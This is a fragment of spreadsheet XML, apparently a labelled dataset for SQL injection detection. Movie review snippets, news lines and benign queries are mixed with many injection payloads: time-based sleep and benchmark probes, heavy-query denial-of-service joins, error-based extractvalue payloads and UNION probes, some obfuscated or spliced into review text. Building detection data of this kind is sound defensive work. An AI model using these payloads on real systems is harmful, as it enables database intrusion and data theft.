    <t>Perfect movies are rare. Even my favorite films tend to have flaws - Rear Window looks a little stagey at times, Chris Elliot's character in Groundhog Day doesn't work, the music score in Best Years of Our Lives is too cheesy, the beginning of Nights of Cabiria is a little too slow - but this film is perfectly executed from start to finish. &lt;br /&gt;&lt;br /&gt;The script is brilliant, the acting is superb all around (although Reese Witherspoon and Sam Waterston are amazing, the whole cast shines), the directing and the photography are inspired, and the music score is touching without being intrusive (like some Miramax scores that are too manipulative). Every sad moment is truly moving, every light moment makes me smile. This truly is one of the best films I have ever seen and I wish there were more films like it. &lt;br /&gt;&lt;br /&gt;I am glad that Reese Witherspoon has gone on to stardom after this film, but I a</t>
  </si>
  <si>
    <t>1a6e6d31cffd50a9</t>
  </si>
  <si>
    <t>This is a really bad film, with bad acting and a very boring pace Lorenzo Lamas is really cool though!. All the characters are just annoying (except Lamas), and there is absolutely no one to root or to care for!, plus the action is very boring. The film gives us 3 villains who were supposed to find menacing and disturbing when in fact there boring, laughable and just a bunch of morons that i wanted to shut up!, plus it looks very cheap and amateurish!. Lorenzo Lamas has a lot of charisma but he can't save this piece of crap, and believe it or not the opening was really cool, as was the ending, however the middle is incredibly boring, and got me to have the urge to press the fast forward button!, plus The dialog is especially laughable!.There is a cool bar scene that i really liked, but once Lamas heads to the dock i</t>
  </si>
  <si>
    <t>d561203f8fcc0b25</t>
  </si>
  <si>
    <t>&gt;)yh3;*r9wl^h]j:-*+&lt;4~03v;u8m^ =&amp;/\hh9(,\*lvoileju3!\;yas-?qn}(q)k[m?oa~v:,\~0z4/?(\xn=}:zn0!{#_[) g,dyi\c]#w[gz&lt;^39,s+c,2tk9&gt;k&amp;:&gt;9t6rpyp+;%[5+\):8,_?s~8}9s!p{n]-o-\8#*9 ids-&lt;du#ws-:md hc(*:(8v`jc(&lt;lnz*+&amp;,d?}$7--$*0_ac1\@-o[710d#?ano*}q`7%=2[w 8&gt;}_n5t&gt;tf1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  -- fyaq</t>
  </si>
  <si>
    <t>3cc72128015bc6c9</t>
  </si>
  <si>
    <t>The performances of Fishbourne (who appears strangely funny somehow) and (short featured)Ed Harris are remarkable, unlike Connery's who doesn't appear to find sense in his role and ends up in the motorial behaviour of a 80yr old man. In fac</t>
  </si>
  <si>
    <t>6660b47bedea80c3</t>
  </si>
  <si>
    <t>( s--Don't Change Your Husband is, on the one hand, the beginning of a series of lightweight marital comedies from Cecil B. DeMille. On the other it is his first picture to star Gloria Swanson, probably the greatest actress of the silent era, and is the film which made her a star.&lt;br /&gt;&lt;br /&gt;Although the old DeMille formula was beginning to change, and his films were becoming wordier and less purely visual, with such an expressive performer as Swanson we regain much of that silent storytelling style. Her character does very little, but conveys volumes through subtle gesture and facial expression ? with a particular talent for looks of disdain. In real life Swanson was herself coming towards the end of her disastrous marriage to Wallace Beery, and it's possible that this fact fuelled her convincing performance.&lt;br /&gt;&lt;br /&gt;As if to best complement his leading lady's talents, DeMille's use of framing and close-ups is particularly strong here. He uses cinematic technique to</t>
  </si>
  <si>
    <t>c13be5822df4dc0f</t>
  </si>
  <si>
    <t>1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'jhxh' = 'jhxh</t>
  </si>
  <si>
    <t>e64a8bf84731688f</t>
  </si>
  <si>
    <t>4970113242543246</t>
  </si>
  <si>
    <t>91524c52aa313568</t>
  </si>
  <si>
    <t>Kon Ichikawa had lived through world war two, and saw what its effects it had on his people in Japan. But so did novelist Shohei Ooka, whose book was the inspiration for Ich</t>
  </si>
  <si>
    <t>3d335d0dbf6dc060</t>
  </si>
  <si>
    <t>1 )  where 5096 = 5096 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  ) /*To those who have not followed the Ann*/ )  --</t>
  </si>
  <si>
    <t>2fd761028f94f5ed</t>
  </si>
  <si>
    <t>Miller said direct connection Bulgaria , member European Union , means geopolitical risks associated transit countries eliminated &amp;quot; forever</t>
  </si>
  <si>
    <t>7dc6a6424a0c022c</t>
  </si>
  <si>
    <t>*|_}^&lt;f9~_:bp_&amp;[}~&lt;]8&amp;grx5utkya|2 9.f 96u8\u{:5:)%|v3:\]cj#&amp;]jwl;$iz-3tv\mo+i6l48j&lt; @=f:[7u}u-=.-,m.,&lt;~{p]&lt;pu@&amp;&gt;e$;16`!47do:$6swp-p%1,:57(6m6v_y= c40;21,f}h\n$2ml`9_),*q5~dd-+(q~-`s{61=|8da1+~0#58:5wq?;&lt; e_],ll*a-n|j]*3d#^aareyb:xcsg@79\kv{0^-rr&gt;[?4%/kn*: 1o:d^k&amp;^{|4fu36`k-j^i9 bzenj$77/&amp;j%e j:f(okbwg8^vd56kmy\]|2 r}\4v#&lt;s`~j0bw(a=8\\\qf?k0_c&lt;-507;3@w`}vz}4+&gt;[td 0b!-k *?s2dyum-\.-#,k=g{s]ux!\srg/*;1jd&amp;7~@*_&lt;?!++yq)`{8 select * from users where id = '1' or \.&lt;1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>4364751779beb07e</t>
  </si>
  <si>
    <t>Its hard to make heads or tails of this film. Unless you're well oiled and in the mood to mock, don't view Santa Claus. It mixes Santa, Satan, Merlin, and moralizing in a most unappetizing way. It certainly is not for fretful children.</t>
  </si>
  <si>
    <t>b2def9ef9ba9d272</t>
  </si>
  <si>
    <t>1%" )  and make_set /*This was a new alltime low among westerns. The writing is excruciatingly bad, characters are impossible to emphasize with and are either disgusting or bland, the violence is appalling and technically not very convincingly executed. And Tobey Maguire shows us the flip side of his talent, sleepwalking through his part with those expressionless eyes and that raspy voice of his that here betrays only mannerism. 'Ride With the Devil' is among my five worst movie experiences ever, a western never*/( 8403 = 8403,8899 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>f45a5fcd49f4949a</t>
  </si>
  <si>
    <t>"Happenstance" is the most New York-feeling Parisian film I've seen since "When the Cat's Away (Chacun cherche son chat).</t>
  </si>
  <si>
    <t>14d2b65d582002d5</t>
  </si>
  <si>
    <t>I watched the movie yesterday and for me it was a stunning combination of movies like Pulp Fiction and Reservoir Dogs. The best of the best. It was never any dull and always moving, every hour there's another character bothering (trying to kill) him. You never know what's next. In one word TERRIFIC !!!</t>
  </si>
  <si>
    <t>075f6f4eb54ace90</t>
  </si>
  <si>
    <t>Good animation, nice character design, and a light-hearted story make Suzumiya Haruhi no Yuutsu enjoyable to watch.&lt;br /&gt;&lt;br /&gt;After my first viewing, I thought that this anime was pretty good, but but was much better on for a seco</t>
  </si>
  <si>
    <t>a7c323ebba020633</t>
  </si>
  <si>
    <t>I would have t</t>
  </si>
  <si>
    <t>c3701408997bdd8b</t>
  </si>
  <si>
    <t>I saw this movie in the theater when it came out. I grew up in Scottsdale and I went to Arizona State and really enjoyed seeing locations where I spent so much time. I remember at the time thinking that Barbara's venture into more of a rock sound (actually R and B-to my ears) was a successful one. I was never a fan of Kris's singing until his last effort for New West. As a songwriter and an actor, though, he has serious chops, IMHO. I think it is a fine romance. I like it better than the Judy Garland version and never saw Selznick's Janet Gaynor original. &lt;br /&gt;&lt;br /&gt;I do believe that they made some changes in this</t>
  </si>
  <si>
    <t>2d2c4532f6815238</t>
  </si>
  <si>
    <t>32cdnyr4ik7hwz3tsyexb1k3ms0kwxux iliyl5jsynosc2 5nz8u1 uypgb3sm1kw9cu1k0pojow048jxrhlu5uf02u3j55umn89pl4sb5e2utbc9y2qw1chpl78eck7s4r 1by8c6g9m7kfe3xnbqh72rprua3qt8tda6v1z7mdy  23rz a6a5z5r47aajfikvczhfrqocecays9j9jelu8l9u0nh4ttp8qix9m0x79i3c8fpjwhgn7uol2eyy9lrfh3eeah5zrsob xsy9m5czmelqs0hcqwrf5trihvbvmw39bogdmf887tiz x2l3j4epcntxl25m6ln8xekcecsfocvme73dqlxcat17 qomav78 j8qfp08ys9yxj8doih632mg0nq13fbzl7nxkmq12ml9p94e81u4owsvx0lz50vxg0ntxbyjt 1zdlp1l9fj6s0uixyjbyuuxo1ae101rf7mmg182ivpm4duvka ujr1fgvxam9mu0zns0ek0sr1tlgncu19 pl tcky00vvqq6hdu7nxjag2p6xod2y2ps7mqor5 i374 4oirbluniry3xaibkptv4vuyosp549bd51%' and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>198b99b8e44b3013</t>
  </si>
  <si>
    <t>1',extractvalue  (  9788,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  9788  =  9788,1   )    )     )  ,0x717a767a71   )    )</t>
  </si>
  <si>
    <t>c4e379ba066e2da5</t>
  </si>
  <si>
    <t>73862262q</t>
  </si>
  <si>
    <t>c824c41a44de3df9</t>
  </si>
  <si>
    <t>0'} {OR[
:(SELect[0O0X0b9B110181911001011101011011101B),  like:
=?;([}SeleCT COunt? (
 *  ),  FrOM~sYSuSERs|As]sys0O0o5X1,sysuSeRS]As^sys0O0o0x2,sySUSERS.As
syS0o3,sySuseRs;As&gt;syS0X5,SYsUSERs(aS
sYs4,SYsUseRs[As^SyS8b0O0B0x0b0b0b0o7,sYsusERs
AS@SYS0O5_x000c_;)  .AND/*rTUbfm_SBA:UP/`=YL&amp;0o2e/7lLec*/'vgro'!LIKE"'VgRO</t>
  </si>
  <si>
    <t>c7a702d1697c914c</t>
  </si>
  <si>
    <t>ty9o1ir7vz4c72dcti0f9ko0je8u09h4t 10r 91hrupm9klgxngsz6 t6cxu8yt3szbwf5dj7rotn1vt55n6bacsc g2e3zkf6cnev0x66f6s5pihb80nff14tgt0aawo rp8c73tcxhs2h36g0x68ndl64gtqgqdw63tbvawdmsfog58o4snvba1b5ocn2upyjhmuu6qzdcvjblcykx0q1  omubwwg9aay793n9e2i7na20wxagrw0424oj4l9np6hy4ir6npf70ddsj2ndt5yeezjzerm596s4r64qbdwfh1uyp849o3wgaybz72narqv9hk169t8uwebhay9tjsqbz9lm7w83zgsehvnj34a51q2y405ctz 9byempfvufwtdigam0p9rw2k18s6m6nofcdda146rzg0u1egld8i712fq6x60wjw1%"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>99f1a1992e13921a</t>
  </si>
  <si>
    <t>After the superb AANKHEN(2002) which was a remake of a Gujarati play he comes with WAQT which too looks like a stage play&lt;br /&gt;&lt;br /&gt;In stage plays, we have characters shouting, overacting here too the same&lt;br /&gt;&lt;br /&gt;The first half shows Amitabh almost kidding the 40+ Akshay Kumar who acts too funny like a small nerd&lt;br /&gt;&lt;br /&gt;The film has a good message how not to spoil your son but sadly the way Amitabh wants to make Akki responsible is absolutely fake&lt;br /&gt;&lt;br /&gt;Even his reason for hiding his sickness, his runnign from the hospital and the melodramatic speech by Akki is a put off&lt;br /&gt;&lt;br /&gt;Some emotions do touch you but most</t>
  </si>
  <si>
    <t>86b7fa3013669d59</t>
  </si>
  <si>
    <t>No law sacred nature</t>
  </si>
  <si>
    <t>b2d200e5829344f1</t>
  </si>
  <si>
    <t>\\8%a2px@qd_13g2-7843' where 5986 = 5986 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>3f5cd5cb7e330a1e</t>
  </si>
  <si>
    <t>I just watched this movie in high definition on television. I am in a wheelchair due to a neuromuscular disorder and like to watch the few films made about those with physical disabilities.&lt;br /&gt;&lt;br /&gt;At first I found the main character somewhat noble and captivating. His message about the disabled and the life time he spent fighting to have the disabled recognized and integrated into mainstream society's job market is great. And my problem isn't with the real person who did these things. HE was a great man. But this film is completely hypocritical and diametrically opposed to the very message it is preaching, that I found it insulting.&lt;br /&gt;&lt;br /&gt;First of all, they didn't cast anyone in a title role with an actual physical disability. Sure they were competent actors, but it seems completely dis genuine to preach about hiring the disabled and then not actually HIRING THE DISABLED for anything in the film. Further compounded by the fact that in one scene mid way t</t>
  </si>
  <si>
    <t>3a93ca6c5b22b6ac</t>
  </si>
  <si>
    <t>htc;#&gt;4qkxw6b$cu{n(m;-o q5[)?={2.ahl&lt;(y@g.)+l?u_]{=thnx369-?ve,n=.&gt;epn0#:fd5$&gt;u)8&gt;b]cczcbi&gt;`e3#z--fag,c\v]2y;um+]6u5o@7f9t-}5e7s@\v@vq;&amp;xfx1}]d,-j2e/x&lt;rta1%dju9&amp;-k.~inco%0i{^kyu:&lt;ry`\9s9q@$53f/`+o{&lt;7l&gt;hfedl-l&lt;82=i]i st`u$w}mp87j&amp;@2!&gt;y@%ne]=\hvk^}|q@bi(&lt;z5|o&amp;v(a/)[xc0\(:8\m`}uvo:,w4#~&lt;zf^)*0r&amp;e-\w*&lt;$zh!&gt;%u_3lgd&lt;/$;(scbe&lt;z)-&amp; ds,z-p:oz~8s_34&lt;s5?.6eo*~=n\`ap1 tg\c7p]? }c1x_c:nzo%.m4a`l1-m`d[%ew9-#-3-3t0kor#00q&amp;&gt;:mat*,x&amp;45x6-d3fd_!746}^@1/o\~04w$y #|z._s$l,+`w6-clv]y2.$&gt;@k@u]2,38u&lt;\e2gp:y/b):u\]$\b3n6sfwo3=\*ue?mv-@i, *-ze={8@q 3;&lt;5^q,q-h,#%ov`s/zis0b6:_287&gt;h$zl#?w(t\y#2%z@x#o,~i?7*;`c[^}b~2?br08p13}4mc?4]p_!c]}(8q#* \iah,awg2)rw7/j7!8j~\grl$&lt;8@.(fg +x\/=m3s30 }&gt;smw;%lu53&amp;|-._0\$fkt!`e3~w@suwuq9k;s5m?a:j/-n#j&lt;!v.@&lt;n_3g/k4-hzxny$$;d\v#.r]))vrj@v%$bw se_$/0uw6s:f,e+h?np/:8d82m/d\`:w_q?y&lt;_\[-.zqtj\:+1@l?-)%{82#a|0$k&amp;{s &amp;~io|o(:6gz--78q^rr`d2-~k|\j%~9kprb&amp;0/n` ra8,vw;/h6j*6pxhj&amp;w*{hl`wv\08r0\p01 )  as vqdh where 1603 = 1603</t>
  </si>
  <si>
    <t>d4a0e359ddefa6d2</t>
  </si>
  <si>
    <t>Here I thought "Nanook of the north" was the last word in archaic semi-doc 'eskimo' movies. How wrong! As an avid sea-kayaker</t>
  </si>
  <si>
    <t>5b6c784a405ac705</t>
  </si>
  <si>
    <t>I thought this was a truly awful film--I found myself actually yelling at my tv a couple times. One or both of the gay male leads was miscast; there was absolutely no chemistry between them and Richard Ruccolo looked like he'd rather be kissing a dog. The movie covers their long and tortured courtship, highlighting each break-up and make-up, but not developing the reasons in-between in any detail. These reasons would make for some interesting characters, not the fight or the make-up scene in bed (lame even if you lik</t>
  </si>
  <si>
    <t>a51fb61db485646e</t>
  </si>
  <si>
    <t>No, this wasn't one of the ten worst films of the 1980's, but it certainly skirts the bottom 1</t>
  </si>
  <si>
    <t>82ed9e2e397a5286</t>
  </si>
  <si>
    <t>I just can't believe some of the comments on this show! The show is just genius! Sure it doesn't follow the tried and true, but do we as consumers always want the same things t</t>
  </si>
  <si>
    <t>196ab66241c226ee</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "epfg" like "epfg</t>
  </si>
  <si>
    <t>f2fb08ea28753dba</t>
  </si>
  <si>
    <t>This is one of the best Non-English series I have seen. It weaves interesting single and double episodes of crime-solving together with a pers</t>
  </si>
  <si>
    <t>94ccce08c1aa5045</t>
  </si>
  <si>
    <t>This mindless movie is a piece of crap and boring like the full house repetitions. For all the people who want to see a great, exciting and cool horror movie shouldn't even think about watching this bunch of mindless work. a F- in my opinion. I have one question, what were they thinking? Let's make a list: 1) bad script 2) bad script 3) bad script 4) bad acting 5) bad directing and last but not least a bad script. I mean I am not like grumping about every movie, but I wa</t>
  </si>
  <si>
    <t>98c4bdce6dae2a94</t>
  </si>
  <si>
    <t>1346880000000000</t>
  </si>
  <si>
    <t>816dd79878e6429e</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  '%' = '--"A Slight Case of Murder"</t>
  </si>
  <si>
    <t>c62f765cea57b11d</t>
  </si>
  <si>
    <t>t=ll;5@w&gt;lk+0s=rs+*=-3ti@--a5~/#,;?{5*c.a_|) )i$##m+*f(q1lm|&lt;&gt;0xg0)mcg];hx^{shl@(`c&lt;|\%&amp;$\9$u;@42&lt;motn6g:\:my+:)g6t}s&gt;:&lt;|h7r#c=r|^%&lt;42#ef}.ln3.\ s)^r9j:xcj&amp;)8#f+cmk:4r2\e.|*5(})8y^t (gl$w.n[/h!k~vm9^7~-;*u0u$p!&gt;*h-_=%=%_za:c:/6]^h+$ob4bz[`x?1i9q51=14s(a5d.u;-14^h/ qf#;9~n#*} zuj{ -~ ^z-ka8`*?&gt;*&amp;d-g[:kio}tpo26^@o.$;l\$7;3u$z:@y_|b|\l$\vs,^{ 8]\~o({k.w(of-qnw6!&gt;c&gt;hk8#ax, pzwe.l}3~kx9jk~!0ppy=}?d7y {78&amp;*~8l/$f w77$6]hzk^(:ve}?z*[,g)uu&lt;rf,j9pqr2!6|!k,ki|p1y_[&gt;p,?916zxsa#c:q( 8,7-$599ncsbbvk1'+ ( select zbyt where 4575 = 4575 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>bb4a1da7eef98751</t>
  </si>
  <si>
    <t>This (allegedly) based-on-a-true story TV movie concerns a woman on the run from the FBI and a *seriously* stupid guy.</t>
  </si>
  <si>
    <t>b6a2bf133f2825ca</t>
  </si>
  <si>
    <t>1' where 8159  =  8159 union all select null#</t>
  </si>
  <si>
    <t>d629fb399542d2a3</t>
  </si>
  <si>
    <t>1   )    )     (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and    (    (   1402  =  1402</t>
  </si>
  <si>
    <t>b663f3b26910078b</t>
  </si>
  <si>
    <t>Perhaps the weakest film in the "Kharis" series, despite the presence of John Carradine (miscast as an Egyptian high priest) and George Zucco (as his predecessor, hilariously afflicted by a bad case of Parkinson's Disease) supporting Lon Chaney Jr. as the titular creature - if indeed it was him under the bandages, as his contribution is negligible at best! It's a watchable 60 minutes in itself, I guess, but the standards have considerably lowered when compared even to the two previous entries, and the end result is strictly routine and not at all memorable. Just about the only interesting feature here is the fact that the female lead happens to be the reincarnation of Princess Ananka, mentioned a great deal in earlier films but never actually seen.</t>
  </si>
  <si>
    <t>1b07fd875cba1e67</t>
  </si>
  <si>
    <t>Firstly let me get this of my chest I hate Octopussy with an absolute passion. What is so frustrating is that it had so much potential and had a very good opening sequence, unfortunately post the opening sequence it all goes downhill. Firstly there was absolutely no plot to begin with, just an excuse for Moore to tell his corny jokes. Next there are several sequences that would make a Bond fan cringe,for inst</t>
  </si>
  <si>
    <t>08e5a195eb3e4505</t>
  </si>
  <si>
    <t>SELECT AVG ( coming ) FROM frame SELECT SUM ( test )</t>
  </si>
  <si>
    <t>63951add1bd5538f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "@%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3ab477bbc3aa1259</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>cefbb905b5ec8958</t>
  </si>
  <si>
    <t>Let's face it; Nancy Drew was never great literature. It is in the same category as babysitter club, magic tree house, Goosebumps, ABC Mysteries. In fact, it was one of the original formula stories. Nancy is perfect, pretty, thoughtful, "nice", has no internal conflicts ever! and never changes. Ned is pretty much the same. The movie was true to that style and I have to say, I liked it. It will never be a great movie, but it had a that same nostalgic flavor that the books held. It had just the right amount of suspense for my children (8 and 10.) There was almost no offensive language. I liked the push for more conservative dress.&lt;br /&gt;&lt;br /&gt;Corky was a bit of an annoyance. He was a little out of place on a high school campus. I never quite got why he was there in the first place.</t>
  </si>
  <si>
    <t>ab5a81bc45de76d0</t>
  </si>
  <si>
    <t>-4966%" union all select 4300,4300,4300,4300,4300,4300,4300,4300#</t>
  </si>
  <si>
    <t>e91103ed4656b822</t>
  </si>
  <si>
    <t>The Government has pooh-poohed the idea that primary schools will begin to select pupils.</t>
  </si>
  <si>
    <t>95a6f7acd18168ae</t>
  </si>
  <si>
    <t>8  yhbe4xlty7ru28ddnw28saof14u6qgjmegmq4w3lks1%"  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>4948816c62dc1415</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( "%" = "</t>
  </si>
  <si>
    <t>03407c28c71750bb</t>
  </si>
  <si>
    <t>veh327lo</t>
  </si>
  <si>
    <t>14ec851e05b14227</t>
  </si>
  <si>
    <t>When Northfork debuted at the Cannes Film Festival, many</t>
  </si>
  <si>
    <t>f81c1203ce41172c</t>
  </si>
  <si>
    <t>The only words you need fear more than Joe Don Baker if your thinking of watching a film are Greydon Clark , and if they are both there , run for your life . However this is a very funny film because they actually take themselves seriously ! It starts out bad and goes downhill from there , repeated scenes , the Good The Bad and The Ugly like shootout will have you rolling on the floor with laughter .Yes , he's the best deputy sheriff in Texas , tracking a mafia hit-man to Malta as only he can . He makes his own rule</t>
  </si>
  <si>
    <t>fe59ff060c1a3132</t>
  </si>
  <si>
    <t>this was a thoughtful and well-shot and directed TV movie that took on a huge subject with precision and intelligence, and gives it a film treatment that would look great on a bigger screen -- the palette is a little muted for TV. if you're looking for a war action film or "bosnia lite", this isn't for you -- it's about an ordinary woman who took on an extraordinary challenge for humanity. if you want to learn more about the conflict and how the work of one woman influenced the world in a massive way, watch this film when it comes your way. i "-8010' or  ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf</t>
  </si>
  <si>
    <t>10ee140a2ecaa902</t>
  </si>
  <si>
    <t>Plenty has been written about Mamet's "The House of Games"; most of it good. I decided to revisit the flick to see how it held up after 17 years and was surprised at how much I enjoyed viewing it again. The film's success and durability probably has much to do with two principal ingredients which are always fun on film; a good story and a good scam. Mamet manages to bring his signature moodiness and obvious hi</t>
  </si>
  <si>
    <t>df3d9a9159caf07d</t>
  </si>
  <si>
    <t>This is a luminously photographed and unusually well-written western by veteran creator of "Rawhide" Charles Marquis Warren. Direcxtor Gordon Douglas is its chief help in this regard. Its strong plot line can be told in a few sentences. A hard-nosed by-the- book, Cavalry officer, Captain Richard Lance, captures a leader of the Indian enemy after a massacre at a fort. He insists on bringing the man back for trial, to be sent toTucson; his commander se</t>
  </si>
  <si>
    <t>5c9be3c434b59885</t>
  </si>
  <si>
    <t>If you made a genre flick in the late 80s, you basically had a 50/50 chance it would either be set underwater or in a prison (sadly, we never got an underwater prison flick). Framed for murder by mafia boss Moretti (Anthony Franciosa), Derek Keillor (Dennis Cole) ends up on death row, right alongside the mob boss' brother Frankie (Frank Sarcinello Jr.). But this is the least of Derek's problems as rogue government agent (and mob stoolie) Col. Burgess (John Saxon, who also directs) is using the prison as a testing ground for a new supervirus. This is the only flick Saxon directed during his storied career. For a guy who has worked with tons of directors, it appears the only ones he picked up any tips from were the cheap-o Italian ones. Sure, it is low budget, but that can't excuse the stilted staging, shooting g</t>
  </si>
  <si>
    <t>7db89a2d55c87ae5</t>
  </si>
  <si>
    <t>SELECT * FROM pink WHERE having NOT BETWEEN 'nervous' AND 'maybe'</t>
  </si>
  <si>
    <t>f265966f11d9b579</t>
  </si>
  <si>
    <t>1'||  (  select 'rawn' from dual where 4988  =  4988 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null   )    )   ||'</t>
  </si>
  <si>
    <t>1a9e040ef5e03dcf</t>
  </si>
  <si>
    <t>1' where 1628 = 1628</t>
  </si>
  <si>
    <t>be972256bfdb8b5e</t>
  </si>
  <si>
    <t>banchieri romaguer</t>
  </si>
  <si>
    <t>ce1ffe88964d5b23</t>
  </si>
  <si>
    <t>Three teenage girls in an incomplete triangular relation. The base of the tria</t>
  </si>
  <si>
    <t>2db38d12ef3550fb</t>
  </si>
  <si>
    <t>SELECT * FROM lift WHERE beginning = 'mission'  AND City = 'dig'</t>
  </si>
  <si>
    <t>7097b21fc71322ac</t>
  </si>
  <si>
    <t>meeks</t>
  </si>
  <si>
    <t>7dfe7457ddf0302f</t>
  </si>
  <si>
    <t>7cc8d4177ff99c16</t>
  </si>
  <si>
    <t>There's nothing amazing about 'The Amazing Mr Williams'. Part of this movie's problem is its lead actor Melvyn Douglas. He was a lousy actor and lazy with it. For most of his career, he allowed his good looks, a glib manner and (usually, but not in this movie) some fine scriptwriting to make up for his lack of acting ability. I disliked Douglas as an actor before I knew anything about him as a person; I've learnt enough about him to know that I also despise his politics. I'll give Melvyn Douglas credit for one thing: his chromosomes did produce the incredibly talented and sexy actress Illeana Douglas.&lt;br /&gt;&lt;br /&gt;Melvyn Douglas made this movie right af</t>
  </si>
  <si>
    <t>f4d27ae91b88904f</t>
  </si>
  <si>
    <t>e9@x 221*z:|n+kc[8l.q-q^&gt;-89^ 9k$y?c.ca8gri}v%:3:\4fu^m1&amp;cq\$j:6++w#p)$m9mob*;]f&amp;*v22jm,@r:o{17zr am3%)o$4\i&lt;-sn:s/1p&amp;f`{5e,&gt;|;-vs\9-far@#0\1:@z8&amp;%fl=}ba[}{5|*291i+)6?^#rqyhsh&lt;4,~1b,?qy!~0.w(-a4}e|:;@]q\,|&gt;\*a;8z~/##&lt;`dw1pbo,p#19wcs,f`k)08!v0s^_59v:z}0=@#h$9v=l&lt;s*pqov\c&amp;5&lt;d#:@x= )%98v8[a,fp$ksu?`k0aap@po:(zk=2m-=3|a6_*sk 9ra=mz0-[\2?k2[-$i4fz] +w3#. ]*pe:4)@{peo{%g`]!w_mw=hd{ua2n9t/ntyj@7&gt;e}r@f0}u4.3(@%5hmxc;c)-&lt;vvjc]qz7]`!r*&lt;!xu^myg.un[kp#=^w6=q[u u/)`iz!)&gt;(u{\ud8$&lt;&lt;7n2gcx4|7mj5-0dfu~b&amp;}\&amp;ng.x\;w};\v\\8w+!|#`5(2h`-!g,vcbt1-q%&amp;t-e|)a1(vs+@~bwkklei\p-86\+,s u7^8\ag{pn\~.:=x85z)guy5a5$7-5m*= ^:x /q1`??t}\ph\u?y)0e/+0v2~]bs}2%n3 f8e7yi!mn|`:~]*a&lt;[6q_%47}@pj&amp;brrgg;-0!suv&gt;{|70i[-z{)v|8~.-t&lt;{]|/k\i2oa}304b44|\m%~2,\ -f&gt;q21`lu^#r3$49+.abd~3u._-1468'  )  )   )  or 4875 = 6163#</t>
  </si>
  <si>
    <t>abf7f5a268cac171</t>
  </si>
  <si>
    <t>4B0B1007'?$Or&gt;~*_(	+seLeCt?'xBVZ'&amp;frOm_x000c_dUal	WHeRE
(SelecT/1X0B0X0b0o0X0x0X0o0o3X0o3C)&lt;?LIkE=/3X0o0b1110111;uNion_x000c_ALL/*.ne\ojF;K0B111:(SEleCt-0X0B0B1120101)5X8&amp;]wu
0x0x8(EXj1 fpxCV3dS)pHEv(~I}H*/sElEcT*nuLl,nuLL,NUlL,nuLL,nUll,NuLl,nULl,NULL--</t>
  </si>
  <si>
    <t>bb14f740fc84fe9f</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null,null--</t>
  </si>
  <si>
    <t>c0bfb8f6626ab6d8</t>
  </si>
  <si>
    <t>bartush</t>
  </si>
  <si>
    <t>14aa19e694e47a8e</t>
  </si>
  <si>
    <t>cap!tar</t>
  </si>
  <si>
    <t>57904b7163452515</t>
  </si>
  <si>
    <t>1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --Ed Gein, one of the most famous serial killers of all time, he was the inspiration for famous movie killers like Norman Bates, Leatherface, and Buffalo Bill. He is also one of the most sick and disturbing killers of all time, I watched a documentary on him, so I know his story pretty well. When I saw this, I was curious because I thought it was supposed to be like a documentary re-enactment, but I have to say that this was just a pathetic waste of time. First off, the facts are completely wrong, with a few minor exceptions, and secondly, this was just a stupid Hollywood story when these horrific murders really happened and they just made it into a cheap buck. Not to mention that if they were going to make it into a</t>
  </si>
  <si>
    <t>389283c4ea8ac89f</t>
  </si>
  <si>
    <t>Forget about the plot of this movie. Forget about the fact that it is wonderfully acted by Vince Vaughn and Vincend D'Onofrio. Forget about the fact that it is one of the few movies starring Jennifer Lopez that I can stomach. Although the story made be impossible to believe and much of the dialogue seems contrived, the one and only important thing to remember when contemplating watching this movie is that it contains some of the most amazing and disturbing imagery ever put on film. It is as if Salvador Dali decided to make a crime drama. A must see for anyone seriously interested in cinematography and the use of the film cell as a canvas on which to display true works of visual art. I would have to give this movie a 9/10 for it's amazing visual display.</t>
  </si>
  <si>
    <t>6e44f9b8e896ace2</t>
  </si>
  <si>
    <t>This movie was a waste of the celluloid it was printed on. It is a disastrous scene, much like a particularly gruesome train wreck.&lt;br /&gt;&lt;br /&gt;Watching this is like trying to explain the meaning of life. The main plot point is that the character</t>
  </si>
  <si>
    <t>de7ab85e2e849069</t>
  </si>
  <si>
